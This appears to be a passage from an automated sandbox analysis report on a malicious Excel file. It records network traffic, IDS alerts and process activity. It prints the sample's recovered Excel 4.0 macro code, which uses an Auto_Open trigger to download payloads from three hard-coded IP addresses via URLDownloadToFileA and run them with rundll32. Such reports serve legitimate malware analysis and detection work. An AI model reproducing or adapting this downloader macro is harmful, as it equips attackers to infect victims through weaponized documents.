Data ASCII: | . . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . o u . . B . P 2 . @ . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . 3 . Z 4 A ? E . . . | . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 01 00 01 00 00 62 04 00 00 e4 00 00 00 10 02 00 00 90 04 00 00 69 04 00 00 d9 04 00 00 00 00 00 00 01 00 00 00 d2 b3 f3 e4 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 a3 48 f6 6f 75 d3 0a 42 90 50 32 bc 40 c7 bd 81 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Macro 4.0 Code |
---|
"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur1""&"",PluginInit"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=GOTO(Hi!D4)
,,,,,,=NOW(),,,,,,,,,,,,,"=NOW()=NOW()=NOW()=FORMULA(""URLDownloadToFileA"",CE271)",,,,,,,,,,,,"=CONCATENATE(CC274,CD266,CC273)",,,,,,,,,,,,,"=CONCATENATE(CC275,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE269,CE273,,1,9)=NOW()=NOW()",JJCCJJ,,,,,,,,,,,"=CONCATENATE(CC276,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE272,CE273,,1,9)",uRlMon,,,,,,,,,,,,"=NOW()=NOW()=NOW()=Belandes(0,CC268,""..\Hodas.vyur"",0,0)",,,,,,,,,,,,,"=NOW()=NOW()=NOW()=Belandes(0,CC269,""..\Hodas.vyur1"",0,0)",JJCCBB,,,,,,,,,,,"="".dat""","=NOW()=NOW()=NOW()=Belandes(0,CC270,""..\Hodas.vyur2"",0,0)",Belandes,,,,,,,,,,,"=""http://83.136.232.110/""",,,,,,,,,,,,,"=""http://185.212.131.194/""",,,,,,,,,,,,,"=""http://190.14.37.247/""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur""&"",PluginInit"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(Jo!E4),,,,,,,
"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur2""&"",PluginInit"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=HALT()
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/06/21-13:56:49.908477 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 185.212.131.194 | 192.168.2.22 |
04/06/21-13:56:52.144287 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 186.148.101.114 | 192.168.2.22 | ||
04/06/21-13:56:55.704260 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 186.148.101.114 | 192.168.2.22 | ||
04/06/21-13:57:02.134366 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 186.148.101.114 | 192.168.2.22 | ||
04/06/21-13:57:12.714807 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 186.148.101.114 | 192.168.2.22 | ||
04/06/21-13:57:17.134598 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 186.148.101.114 | 192.168.2.22 | ||
04/06/21-13:57:20.694827 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | 186.148.101.114 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 6, 2021 13:56:07.582269907 CEST | 49167 | 80 | 192.168.2.22 | 83.136.232.110 |
Apr 6, 2021 13:56:10.584435940 CEST | 49167 | 80 | 192.168.2.22 | 83.136.232.110 |
Apr 6, 2021 13:56:16.591010094 CEST | 49167 | 80 | 192.168.2.22 | 83.136.232.110 |
Apr 6, 2021 13:56:28.607074022 CEST | 49168 | 80 | 192.168.2.22 | 83.136.232.110 |
Apr 6, 2021 13:56:31.615137100 CEST | 49168 | 80 | 192.168.2.22 | 83.136.232.110 |
Apr 6, 2021 13:56:37.621575117 CEST | 49168 | 80 | 192.168.2.22 | 83.136.232.110 |
Apr 6, 2021 13:56:49.667118073 CEST | 49169 | 80 | 192.168.2.22 | 185.212.131.194 |
Apr 6, 2021 13:56:49.715688944 CEST | 80 | 49169 | 185.212.131.194 | 192.168.2.22 |
Apr 6, 2021 13:56:49.715841055 CEST | 49169 | 80 | 192.168.2.22 | 185.212.131.194 |
Apr 6, 2021 13:56:49.716993093 CEST | 49169 | 80 | 192.168.2.22 | 185.212.131.194 |
Apr 6, 2021 13:56:49.764610052 CEST | 80 | 49169 | 185.212.131.194 | 192.168.2.22 |
Apr 6, 2021 13:56:49.908477068 CEST | 80 | 49169 | 185.212.131.194 | 192.168.2.22 |
Apr 6, 2021 13:56:49.908761978 CEST | 49169 | 80 | 192.168.2.22 | 185.212.131.194 |
Apr 6, 2021 13:56:49.932933092 CEST | 49170 | 80 | 192.168.2.22 | 190.14.37.247 |
Apr 6, 2021 13:56:52.926547050 CEST | 49170 | 80 | 192.168.2.22 | 190.14.37.247 |
Apr 6, 2021 13:56:58.933198929 CEST | 49170 | 80 | 192.168.2.22 | 190.14.37.247 |
Apr 6, 2021 13:57:10.931849003 CEST | 49171 | 80 | 192.168.2.22 | 190.14.37.247 |
Apr 6, 2021 13:57:13.941555977 CEST | 49171 | 80 | 192.168.2.22 | 190.14.37.247 |
Apr 6, 2021 13:57:19.948101044 CEST | 49171 | 80 | 192.168.2.22 | 190.14.37.247 |
Apr 6, 2021 13:57:54.957835913 CEST | 80 | 49169 | 185.212.131.194 | 192.168.2.22 |
Apr 6, 2021 13:57:54.958056927 CEST | 49169 | 80 | 192.168.2.22 | 185.212.131.194 |
Apr 6, 2021 13:58:00.986504078 CEST | 49169 | 80 | 192.168.2.22 | 185.212.131.194 |
Apr 6, 2021 13:58:01.035425901 CEST | 80 | 49169 | 185.212.131.194 | 192.168.2.22 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49169 | 185.212.131.194 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 13:56:49.716993093 CEST | 0 | OUT | |
Apr 6, 2021 13:56:49.908477068 CEST | 1 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 13:55:37 |
Start date: | 06/04/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13ff60000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 13:57:04 |
Start date: | 06/04/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff1d0000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 13:57:05 |
Start date: | 06/04/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff1d0000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 13:57:05 |
Start date: | 06/04/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff1d0000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: Module1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Module1" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
ScreenUpdating | |
Run | Microsoft Excel:Application.Run( |
Range |
Strings | Decrypted Strings |
---|---|
"CD105" | |
"Lops" |
Line | Instruction | Meta Information |
---|---|---|
2 | Private Sub Auto_Open() | |
3 | Application.ScreenUpdating = True | ScreenUpdating executed |
4 | Application.Run Sheets("Lops").Range("CD105") | Microsoft Excel:Application.Run( Range executed |
5 | End Sub |
Module: \x041b\x0438\x0441\x04421 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "\x041b\x0438\x0441\x04421" |
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
Module: \x041b\x0438\x0441\x04422 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "\x041b\x0438\x0441\x04422" |
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
Module: \x042d\x0442\x0430\x041a\x043d\x0438\x0433\x0430 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "\x042d\x0442\x0430\x041a\x043d\x0438\x0433\x0430" |
2 | Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |